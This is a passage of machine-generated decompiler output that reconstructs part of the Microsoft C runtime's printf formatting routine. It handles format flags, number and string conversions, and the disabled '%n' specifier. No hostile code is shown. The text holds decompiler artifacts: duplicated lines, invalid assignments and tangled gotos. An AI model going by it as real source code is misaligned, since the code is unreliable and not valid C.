											 *(__ebp - 0x320) =  *((char*)(__ebp - 0x251));
											 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
											 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
											__eflags =  *(__ebp - 0x320) - 0x2e;
											if( *(__ebp - 0x320) > 0x2e) {
												L70:
												goto L218;
											}
											L48:
											__ecx =  *(__ebp - 0x320);
											_t117 = __ecx + 0x422b10; // 0x231e9003
											__edx =  *_t117 & 0x000000ff;
											switch( *((intOrPtr*)(( *_t117 & 0x000000ff) * 4 +  &M00422AFC))) {
												case 0:
													L53:
													__edx =  *(__ebp + 0xc);
													__eax =  *( *(__ebp + 0xc));
													__eflags =  *( *(__ebp + 0xc)) - 0x36;
													if( *( *(__ebp + 0xc)) != 0x36) {
														L56:
														__edx =  *(__ebp + 0xc);
														__eax =  *( *(__ebp + 0xc));
														__eflags =  *( *(__ebp + 0xc)) - 0x33;
														if( *( *(__ebp + 0xc)) != 0x33) {
															L59:
															__edx =  *(__ebp + 0xc);
															__eax =  *( *(__ebp + 0xc));
															__eflags =  *( *(__ebp + 0xc)) - 0x64;
															if( *( *(__ebp + 0xc)) == 0x64) {
																L65:
																L67:
																goto L70;
															}
															L60:
															__ecx =  *(__ebp + 0xc);
															__edx =  *__ecx;
															__eflags =  *__ecx - 0x69;
															if( *__ecx == 0x69) {
																goto L65;
															}
															L61:
															__eax =  *(__ebp + 0xc);
															__ecx =  *( *(__ebp + 0xc));
															__eflags = __ecx - 0x6f;
															if(__ecx == 0x6f) {
																goto L65;
															}
															L62:
															__edx =  *(__ebp + 0xc);
															__eax =  *( *(__ebp + 0xc));
															__eflags =  *( *(__ebp + 0xc)) - 0x75;
															if( *( *(__ebp + 0xc)) == 0x75) {
																goto L65;
															}
															L63:
															__ecx =  *(__ebp + 0xc);
															__edx =  *__ecx;
															__eflags =  *__ecx - 0x78;
															if( *__ecx == 0x78) {
																goto L65;
															}
															L64:
															__eax =  *(__ebp + 0xc);
															__ecx =  *( *(__ebp + 0xc));
															__eflags = __ecx - 0x58;
															if(__ecx != 0x58) {
																 *(__ebp - 0x25c) = 0;
																goto L18;
															}
															goto L65;
														}
														L57:
														__ecx =  *(__ebp + 0xc);
														__edx =  *((char*)(__ecx + 1));
														__eflags =  *((char*)(__ecx + 1)) - 0x32;
														if( *((char*)(__ecx + 1)) != 0x32) {
															goto L59;
														} else {
															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
															__ecx =  *(__ebp - 0x10);
															__ecx =  *(__ebp - 0x10) & 0xffff7fff;
															 *(__ebp - 0x10) = __ecx;
															goto L67;
														}
													}
													L54:
													__ecx =  *(__ebp + 0xc);
													__edx =  *((char*)(__ecx + 1));
													__eflags =  *((char*)(__ecx + 1)) - 0x34;
													if( *((char*)(__ecx + 1)) != 0x34) {
														goto L56;
													} else {
														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
														__ecx =  *(__ebp - 0x10);
														__ecx =  *(__ebp - 0x10) | 0x00008000;
														 *(__ebp - 0x10) = __ecx;
														goto L67;
													}
												case 1:
													L68:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
													goto L70;
												case 2:
													L49:
													__eax =  *(__ebp + 0xc);
													__ecx =  *( *(__ebp + 0xc));
													__eflags = __ecx - 0x6c;
													if(__ecx != 0x6c) {
														__ecx =  *(__ebp - 0x10);
														__ecx =  *(__ebp - 0x10) | 0x00000010;
														__eflags = __ecx;
														 *(__ebp - 0x10) = __ecx;
													} else {
														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
													}
													goto L70;
												case 3:
													L69:
													__eax =  *(__ebp - 0x10);
													__eax =  *(__ebp - 0x10) | 0x00000800;
													__eflags = __eax;
													 *(__ebp - 0x10) = __eax;
													goto L70;
												case 4:
													goto L70;
											}
										case 7:
											L71:
											__ecx =  *((char*)(__ebp - 0x251));
											 *(__ebp - 0x324) = __ecx;
											 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
											 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
											__eflags =  *(__ebp - 0x324) - 0x37;
											if( *(__ebp - 0x324) > 0x37) {
												goto L190;
												do {
													do {
														while(1) {
															L190:
															if( *(_t623 - 0x28) != 0) {
																goto L216;
															}
															goto L191;
														}
														L186:
														__ebp - 0x49 = __ebp - 0x49 -  *(__ebp - 4);
														 *(__ebp - 0x24) = __ebp - 0x49 -  *(__ebp - 4);
														__ecx =  *(__ebp - 4);
														__ecx =  *(__ebp - 4) + 1;
														 *(__ebp - 4) = __ecx;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
														__eflags =  *(__ebp - 0x10) & 0x00000200;
													} while (( *(__ebp - 0x10) & 0x00000200) == 0);
													__eflags =  *(__ebp - 0x24);
													if( *(__ebp - 0x24) == 0) {
														break;
													}
													L188:
													__eax =  *(__ebp - 4);
													__ecx =  *( *(__ebp - 4));
													__eflags = __ecx - 0x30;
												} while (__ecx == 0x30);
												L189:
												 *(__ebp - 4) =  *(__ebp - 4) - 1;
												 *(__ebp - 4) =  *(__ebp - 4) - 1;
												__eax =  *(__ebp - 4);
												 *( *(__ebp - 4)) = 0x30;
												__ecx =  *(__ebp - 0x24);
												__ecx =  *(__ebp - 0x24) + 1;
												__eflags = __ecx;
												 *(__ebp - 0x24) = __ecx;
												while(1) {
													L190:
													if( *(_t623 - 0x28) != 0) {
														goto L216;
													}
													goto L191;
												}
											}
											L72:
											_t158 =  *(__ebp - 0x324) + 0x422b7c; // 0xcccccc0d
											__ecx =  *_t158 & 0x000000ff;
											switch( *((intOrPtr*)(__ecx * 4 +  &M00422B40))) {
												case 0:
													L122:
													 *(__ebp - 0x2c) = 1;
													__ecx =  *((char*)(__ebp - 0x251));
													__ecx =  *((char*)(__ebp - 0x251)) + 0x20;
													__eflags = __ecx;
													 *((char*)(__ebp - 0x251)) = __cl;
													goto L123;
												case 1:
													L73:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
													__eflags =  *(__ebp - 0x10) & 0x00000830;
													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
														__eax =  *(__ebp - 0x10);
														__eax =  *(__ebp - 0x10) | 0x00000800;
														__eflags = __eax;
														 *(__ebp - 0x10) = __eax;
													}
													goto L75;
												case 2:
													L87:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
													__eflags =  *(__ebp - 0x10) & 0x00000830;
													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
														__ecx =  *(__ebp - 0x10);
														__ecx =  *(__ebp - 0x10) | 0x00000800;
														__eflags = __ecx;
														 *(__ebp - 0x10) = __ecx;
													}
													goto L89;
												case 3:
													L146:
													 *(__ebp - 0x260) = 7;
													goto L148;
												case 4:
													goto L0;
												case 5:
													L123:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
													__eax = __ebp - 0x248;
													 *(__ebp - 4) = __ebp - 0x248;
													 *(__ebp - 0x44) = 0x200;
													__eflags =  *(__ebp - 0x30);
													if( *(__ebp - 0x30) >= 0) {
														L125:
														__eflags =  *(__ebp - 0x30);
														if( *(__ebp - 0x30) != 0) {
															L128:
															__eflags =  *(__ebp - 0x30) - 0x200;
															if( *(__ebp - 0x30) > 0x200) {
																 *(__ebp - 0x30) = 0x200;
															}
															L130:
															__eflags =  *(__ebp - 0x30) - 0xa3;
															if( *(__ebp - 0x30) > 0xa3) {
																 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
																 *(__ebp - 0x20) = L0040E5B0(__ecx,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
																__eflags =  *(__ebp - 0x20);
																if( *(__ebp - 0x20) == 0) {
																	 *(__ebp - 0x30) = 0xa3;
																} else {
																	__eax =  *(__ebp - 0x20);
																	 *(__ebp - 4) =  *(__ebp - 0x20);
																	 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
																	 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
																}
															}
															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
															__eax =  *(__ebp + 0x14);
															__ecx =  *(__eax - 8);
															__edx =  *(__eax - 4);
															 *(__ebp - 0x2a8) =  *(__eax - 8);
															 *(__ebp - 0x2a4) =  *(__eax - 4);
															__ecx = __ebp - 0x40;
															_push(E004103A0(__ebp - 0x40));
															__eax =  *(__ebp - 0x2c);
															_push( *(__ebp - 0x2c));
															__ecx =  *(__ebp - 0x30);
															_push( *(__ebp - 0x30));
															__edx =  *((char*)(__ebp - 0x251));
															_push( *((char*)(__ebp - 0x251)));
															__eax =  *(__ebp - 0x44);
															_push( *(__ebp - 0x44));
															__ecx =  *(__ebp - 4);
															_push( *(__ebp - 4));
															__edx = __ebp - 0x2a8;
															_push(__ebp - 0x2a8);
															__eax =  *0x4bb808; // 0x776010b9
															__eax =  *__eax();
															__esp = __esp + 0x1c;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
															__eflags =  *(__ebp - 0x10) & 0x00000080;
															if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																__eflags =  *(__ebp - 0x30);
																if( *(__ebp - 0x30) == 0) {
																	__ecx = __ebp - 0x40;
																	_push(E004103A0(__ebp - 0x40));
																	__edx =  *(__ebp - 4);
																	_push( *(__ebp - 4));
																	__eax =  *0x4bb814; // 0x776010b9
																	__eax =  *__eax();
																	__esp = __esp + 8;
																}
															}
															__ecx =  *((char*)(__ebp - 0x251));
															__eflags =  *((char*)(__ebp - 0x251)) - 0x67;
															if( *((char*)(__ebp - 0x251)) == 0x67) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																__eflags =  *(__ebp - 0x10) & 0x00000080;
																if(( *(__ebp - 0x10) & 0x00000080) == 0) {
																	__ecx = __ebp - 0x40;
																	_push(E004103A0(__ebp - 0x40));
																	__eax =  *(__ebp - 4);
																	_push( *(__ebp - 4));
																	__ecx =  *0x4bb810; // 0x776010b9
																	E00411D00(__ecx) =  *__eax();
																	__esp = __esp + 8;
																}
															}
															__edx =  *(__ebp - 4);
															__eax =  *( *(__ebp - 4));
															__eflags =  *( *(__ebp - 4)) - 0x2d;
															if( *( *(__ebp - 4)) == 0x2d) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																__edx =  *(__ebp - 4);
																__edx =  *(__ebp - 4) + 1;
																__eflags = __edx;
																 *(__ebp - 4) = __edx;
															}
															__eax =  *(__ebp - 4);
															 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
															goto L190;
														}
														L126:
														__ecx =  *((char*)(__ebp - 0x251));
														__eflags = __ecx - 0x67;
														if(__ecx != 0x67) {
															goto L128;
														}
														L127:
														 *(__ebp - 0x30) = 1;
														goto L130;
													}
													L124:
													 *(__ebp - 0x30) = 6;
													goto L130;
												case 6:
													L75:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
													__eflags =  *(__ebp - 0x10) & 0x00000810;
													if(( *(__ebp - 0x10) & 0x00000810) == 0) {
														__ebp + 0x14 = E0041F270(__ebp + 0x14);
														 *(__ebp - 0x284) = __ax;
														__cl =  *(__ebp - 0x284);
														 *(__ebp - 0x248) = __cl;
														 *(__ebp - 0x24) = 1;
													} else {
														 *(__ebp - 0x280) = 0;
														__edx = __ebp + 0x14;
														__eax = E00421650(__ebp + 0x14);
														 *(__ebp - 0x258) = __ax;
														__eax =  *(__ebp - 0x258) & 0x0000ffff;
														__ecx = __ebp - 0x248;
														__edx = __ebp - 0x24;
														 *(__ebp - 0x280) = E00424E90(__ebp - 0x24, __ebp - 0x248, 0x200,  *(__ebp - 0x258) & 0x0000ffff);
														__eflags =  *(__ebp - 0x280);
														if( *(__ebp - 0x280) != 0) {
															 *(__ebp - 0x28) = 1;
														}
													}
													__edx = __ebp - 0x248;
													 *(__ebp - 4) = __ebp - 0x248;
													do {
														L190:
														if( *(_t623 - 0x28) != 0) {
															goto L216;
														}
														goto L191;
													} while ( *(__ebp - 0x324) > 0x37);
													goto L72;
												case 7:
													L143:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
													 *(__ebp - 8) = 0xa;
													goto L153;
												case 8:
													L108:
													__ecx = __ebp + 0x14;
													 *(__ebp - 0x298) = E0041F270(__ebp + 0x14);
													__eax = E00424120();
													__eflags = __eax;
													if(__eax != 0) {
														L118:
														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
														__eflags =  *(__ebp - 0x10) & 0x00000020;
														if(( *(__ebp - 0x10) & 0x00000020) == 0) {
															__edx =  *(__ebp - 0x298);
															__eax =  *(__ebp - 0x24c);
															 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
														} else {
															__eax =  *(__ebp - 0x298);
															 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
														}
														 *(__ebp - 0x28) = 1;
														while(1) {
															L190:
															if( *(_t623 - 0x28) != 0) {
																goto L216;
															}
															goto L191;
														}
													}
													L109:
													__edx = 0;
													__eflags = 0;
													if(0 == 0) {
														 *(__ebp - 0x32c) = 0;
													} else {
														 *(__ebp - 0x32c) = 1;
													}
													__eax =  *(__ebp - 0x32c);
													 *(__ebp - 0x29c) =  *(__ebp - 0x32c);
													__eflags =  *(__ebp - 0x29c);
													if( *(__ebp - 0x29c) == 0) {
														_push(L"(\"\'n\' format specifier disabled\", 0)");
														_push(0);
														_push(0x695);
														_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
														_push(2);
														__eax = L0040C820();
														__esp = __esp + 0x14;
														__eflags = __eax - 1;
														if(__eax == 1) {
															asm("int3");
														}
													}
													__eflags =  *(__ebp - 0x29c);
													if( *(__ebp - 0x29c) != 0) {
														L117:
														while(1) {
															L190:
															if( *(_t623 - 0x28) != 0) {
																goto L216;
															}
															goto L191;
														}
													} else {
														L116:
														 *((intOrPtr*)(L00411810(__ecx))) = 0x16;
														__eax = E0040C660(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
														 *(__ebp - 0x2f8) = 0xffffffff;
														__ecx = __ebp - 0x40;
														__eax = E00410370(__ecx);
														__eax =  *(__ebp - 0x2f8);
														goto L229;
													}
												case 9:
													L151:
													 *(__ebp - 8) = 8;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
													__eflags =  *(__ebp - 0x10) & 0x00000080;
													if(( *(__ebp - 0x10) & 0x00000080) != 0) {
														__edx =  *(__ebp - 0x10);
														__edx =  *(__ebp - 0x10) | 0x00000200;
														__eflags = __edx;
														 *(__ebp - 0x10) = __edx;
													}
													goto L153;
												case 0xa:
													L145:
													 *(__ebp - 0x30) = 8;
													goto L146;
												case 0xb:
													L89:
													__eflags =  *(__ebp - 0x30) - 0xffffffff;
													if( *(__ebp - 0x30) != 0xffffffff) {
														__edx =  *(__ebp - 0x30);
														 *(__ebp - 0x328) =  *(__ebp - 0x30);
													} else {
														 *(__ebp - 0x328) = 0x7fffffff;
													}
													__eax =  *(__ebp - 0x328);
													 *(__ebp - 0x290) =  *(__ebp - 0x328);
													__ecx = __ebp + 0x14;
													 *(__ebp - 4) = E0041F270(__ebp + 0x14);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
													__eflags =  *(__ebp - 0x10) & 0x00000810;
													if(( *(__ebp - 0x10) & 0x00000810) == 0) {
														L100:
														__eflags =  *(__ebp - 4);
														if( *(__ebp - 4) == 0) {
															__edx =  *0x4bc060; // 0x408114
															 *(__ebp - 4) = __edx;
														}
														__eax =  *(__ebp - 4);
														 *(__ebp - 0x28c) =  *(__ebp - 4);
														while(1) {
															L103:
															__ecx =  *(__ebp - 0x290);
															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
															__eflags = __ecx;
															if(__ecx == 0) {
																break;
															}
															L104:
															__eax =  *(__ebp - 0x28c);
															__ecx =  *( *(__ebp - 0x28c));
															__eflags = __ecx;
															if(__ecx == 0) {
																break;
															}
															L105:
															 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
															 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
														}
														L106:
														__eax =  *(__ebp - 0x28c);
														__eax =  *(__ebp - 0x28c) -  *(__ebp - 4);
														__eflags = __eax;
														 *(__ebp - 0x24) = __eax;
														goto L107;
													} else {
														L93:
														__eflags =  *(__ebp - 4);
														if( *(__ebp - 4) == 0) {
															__eax =  *0x4bc064; // 0x408104
															 *(__ebp - 4) = __eax;
														}
														 *(__ebp - 0xc) = 1;
														__ecx =  *(__ebp - 4);
														 *(__ebp - 0x294) =  *(__ebp - 4);
														while(1) {
															L96:
															__edx =  *(__ebp - 0x290);
															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
															__eflags =  *(__ebp - 0x290);
															if( *(__ebp - 0x290) == 0) {
																break;
															}
															L97:
															__ecx =  *(__ebp - 0x294);
															__edx =  *( *(__ebp - 0x294)) & 0x0000ffff;
															__eflags =  *( *(__ebp - 0x294)) & 0x0000ffff;
															if(( *( *(__ebp - 0x294)) & 0x0000ffff) == 0) {
																break;
															}
															L98:
															 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
															 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
														}
														L99:
														 *(__ebp - 0x294) =  *(__ebp - 0x294) -  *(__ebp - 4);
														__ecx =  *(__ebp - 0x294) -  *(__ebp - 4) >> 1;
														 *(__ebp - 0x24) = __ecx;
														L107:
														while(1) {
															L190:
															if( *(_t623 - 0x28) != 0) {
																goto L216;
															}
															goto L191;
														}
													}
												case 0xc:
													L144:
													 *(__ebp - 8) = 0xa;
													goto L153;
												case 0xd:
													L147:
													 *(__ebp - 0x260) = 0x27;
													L148:
													 *(__ebp - 8) = 0x10;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
													__eflags =  *(__ebp - 0x10) & 0x00000080;
													if(( *(__ebp - 0x10) & 0x00000080) != 0) {
														 *((char*)(__ebp - 0x14)) = 0x30;
														 *(__ebp - 0x260) =  *(__ebp - 0x260) + 0x51;
														__eflags =  *(__ebp - 0x260) + 0x51;
														 *((char*)(__ebp - 0x13)) = __al;
														 *(__ebp - 0x1c) = 2;
													}
													L153:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
													__eflags =  *(__ebp - 0x10) & 0x00008000;
													if(( *(__ebp - 0x10) & 0x00008000) == 0) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
														__eflags =  *(__ebp - 0x10) & 0x00001000;
														if(( *(__ebp - 0x10) & 0x00001000) == 0) {
															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
															__eflags =  *(__ebp - 0x10) & 0x00000020;
															if(( *(__ebp - 0x10) & 0x00000020) == 0) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																__eflags =  *(__ebp - 0x10) & 0x00000040;
																if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																	__ecx = __ebp + 0x14;
																	__eax = E0041F270(__ebp + 0x14);
																	__edx = 0;
																	__eflags = 0;
																	 *(__ebp - 0x2b8) = __eax;
																	 *(__ebp - 0x2b4) = 0;
																} else {
																	__eax = __ebp + 0x14;
																	__eax = E0041F270(__ebp + 0x14);
																	asm("cdq");
																	 *(__ebp - 0x2b8) = __eax;
																	 *(__ebp - 0x2b4) = __edx;
																}
															} else {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																__eflags =  *(__ebp - 0x10) & 0x00000040;
																if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																	__ecx = __ebp + 0x14;
																	E0041F270(__ebp + 0x14) = __ax & 0x0000ffff;
																	asm("cdq");
																	 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
																	 *(__ebp - 0x2b4) = __edx;
																} else {
																	__eax = __ebp + 0x14;
																	__eax = E0041F270(__ebp + 0x14);
																	__ax = __eax;
																	asm("cdq");
																	 *(__ebp - 0x2b8) = __eax;
																	 *(__ebp - 0x2b4) = __edx;
																}
															}
														} else {
															__eax = __ebp + 0x14;
															 *(__ebp - 0x2b8) = E0041F290(__ebp + 0x14);
															 *(__ebp - 0x2b4) = __edx;
														}
													} else {
														__ecx = __ebp + 0x14;
														 *(__ebp - 0x2b8) = E0041F290(__ebp + 0x14);
														 *(__ebp - 0x2b4) = __edx;
													}
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
													__eflags =  *(__ebp - 0x10) & 0x00000040;
													if(( *(__ebp - 0x10) & 0x00000040) == 0) {
														L170:
														__ecx =  *(__ebp - 0x2b8);
														 *(__ebp - 0x2c0) =  *(__ebp - 0x2b8);
														__edx =  *(__ebp - 0x2b4);
														 *(__ebp - 0x2bc) =  *(__ebp - 0x2b4);
														goto L171;
													} else {
														L166:
														__eflags =  *(__ebp - 0x2b4);
														if(__eflags > 0) {
															goto L170;
														}
														L167:
														if(__eflags < 0) {
															L169:
															 *(__ebp - 0x2b8) =  ~( *(__ebp - 0x2b8));
															__edx =  *(__ebp - 0x2b4);
															asm("adc edx, 0x0");
															__edx =  ~( *(__ebp - 0x2b4));
															 *(__ebp - 0x2c0) =  ~( *(__ebp - 0x2b8));
															 *(__ebp - 0x2bc) =  ~( *(__ebp - 0x2b4));
															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
															L171:
															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
															__eflags =  *(__ebp - 0x10) & 0x00008000;
															if(( *(__ebp - 0x10) & 0x00008000) == 0) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
																__eflags =  *(__ebp - 0x10) & 0x00001000;
																if(( *(__ebp - 0x10) & 0x00001000) == 0) {
																	__edx =  *(__ebp - 0x2c0);
																	__eax =  *(__ebp - 0x2bc);
																	__eax =  *(__ebp - 0x2bc) & 0x00000000;
																	__eflags = __eax;
																	 *(__ebp - 0x2bc) = __eax;
																}
															}
															__eflags =  *(__ebp - 0x30);
															if( *(__ebp - 0x30) >= 0) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
																__eflags =  *(__ebp - 0x30) - 0x200;
																if( *(__ebp - 0x30) > 0x200) {
																	 *(__ebp - 0x30) = 0x200;
																}
															} else {
																 *(__ebp - 0x30) = 1;
															}
															 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
															__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
															if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
																 *(__ebp - 0x1c) = 0;
															}
															__eax = __ebp - 0x49;
															 *(__ebp - 4) = __ebp - 0x49;
															while(1) {
																L181:
																__ecx =  *(__ebp - 0x30);
																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
																__eflags =  *(__ebp - 0x30);
																if( *(__ebp - 0x30) > 0) {
																	goto L183;
																}
																L182:
																 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
																__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
																if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
																	goto L186;
																}
																L183:
																__eax =  *(__ebp - 8);
																asm("cdq");
																__ecx =  *(__ebp - 0x2bc);
																__edx =  *(__ebp - 0x2c0);
																__eax = E00421720( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8),  *(__ebp - 0x2c0));
																 *(__ebp - 0x2ac) = __eax;
																__eax =  *(__ebp - 8);
																asm("cdq");
																__eax =  *(__ebp - 0x2bc);
																__ecx =  *(__ebp - 0x2c0);
																 *(__ebp - 0x2c0) = E004216B0( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8), __edx);
																 *(__ebp - 0x2bc) = __edx;
																__eflags =  *(__ebp - 0x2ac) - 0x39;
																if( *(__ebp - 0x2ac) > 0x39) {
																	__edx =  *(__ebp - 0x2ac);
																	__edx =  *(__ebp - 0x2ac) +  *(__ebp - 0x260);
																	__eflags = __edx;
																	 *(__ebp - 0x2ac) = __edx;
																}
																__eax =  *(__ebp - 4);
																__cl =  *(__ebp - 0x2ac);
																 *( *(__ebp - 4)) = __cl;
																 *(__ebp - 4) =  *(__ebp - 4) - 1;
																 *(__ebp - 4) =  *(__ebp - 4) - 1;
																L181:
																__ecx =  *(__ebp - 0x30);
																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
																__eflags =  *(__ebp - 0x30);
																if( *(__ebp - 0x30) > 0) {
																	goto L183;
																}
																goto L182;
															}
														}
														L168:
														__eflags =  *(__ebp - 0x2b8);
														if( *(__ebp - 0x2b8) >= 0) {
															goto L170;
														}
														goto L169;
													}
												case 0xe:
													while(1) {
														L190:
														if( *(_t623 - 0x28) != 0) {
															goto L216;
														}
														goto L191;
													}
											}
										case 8:
											L30:
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
											goto L33;
										case 9:
											L31:
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
											goto L33;
										case 0xa:
											L29:
											__ecx =  *(__ebp - 0x10);
											__ecx =  *(__ebp - 0x10) | 0x00000001;
											 *(__ebp - 0x10) = __ecx;
											goto L33;
										case 0xb:
											L28:
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
											goto L33;
										case 0xc:
											L32:
											__ecx =  *(__ebp - 0x10);
											__ecx =  *(__ebp - 0x10) | 0x00000008;
											__eflags = __ecx;
											 *(__ebp - 0x10) = __ecx;
											goto L33;
										case 0xd:
											L33:
											goto L218;
									}
								} else {
									if(0 == 0) {
										 *(_t623 - 0x314) = 0;
									} else {
										 *(_t623 - 0x314) = 1;
									}
									_t573 =  *(_t623 - 0x314);
									 *(_t623 - 0x278) =  *(_t623 - 0x314);
									if( *(_t623 - 0x278) == 0) {
										_push(L"(\"Incorrect format specifier\", 0)");
										_push(0);
										_push(0x460);
										_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
										_push(2);
										_t530 = L0040C820();
										_t626 = _t626 + 0x14;
										if(_t530 == 1) {
											asm("int3");
										}
									}
									L14:
									if( *(_t623 - 0x278) != 0) {
										goto L16;
									} else {
										 *((intOrPtr*)(L00411810(_t573))) = 0x16;
										E0040C660(_t558, _t573, _t621, _t622, L"(\"Incorrect format specifier\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
										 *(_t623 - 0x2f0) = 0xffffffff;
										E00410370(_t623 - 0x40);
										_t503 =  *(_t623 - 0x2f0);
										L229:
										return E00410900(_t503, _t558,  *(_t623 - 0x48) ^ _t623, _t594, _t621, _t622);
									}
								}
							}
							L219:
							if( *(_t623 - 0x25c) == 0) {
								L222:
								 *(_t623 - 0x334) = 1;
								L223:
								_t560 =  *(_t623 - 0x334);
								 *(_t623 - 0x2e0) =  *(_t623 - 0x334);
								if( *(_t623 - 0x2e0) == 0) {
									_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
									_push(0);
									_push(0x8f5);
									_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
									_push(2);
									_t508 = L0040C820();
									_t626 = _t626 + 0x14;
									if(_t508 == 1) {
										asm("int3");
									}
								}
								if( *(_t623 - 0x2e0) != 0) {
									 *(_t623 - 0x300) =  *(_t623 - 0x24c);
									E00410370(_t623 - 0x40);
									_t503 =  *(_t623 - 0x300);
								} else {
									 *((intOrPtr*)(L00411810(_t560))) = 0x16;
									E0040C660(_t558, _t560, _t621, _t622, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
									 *(_t623 - 0x2fc) = 0xffffffff;
									E00410370(_t623 - 0x40);
									_t503 =  *(_t623 - 0x2fc);
								}
								goto L229;
							}
							L220:
							if( *(_t623 - 0x25c) == 7) {
								goto L222;
							}
							L221:
							 *(_t623 - 0x334) = 0;
							goto L223;
						}
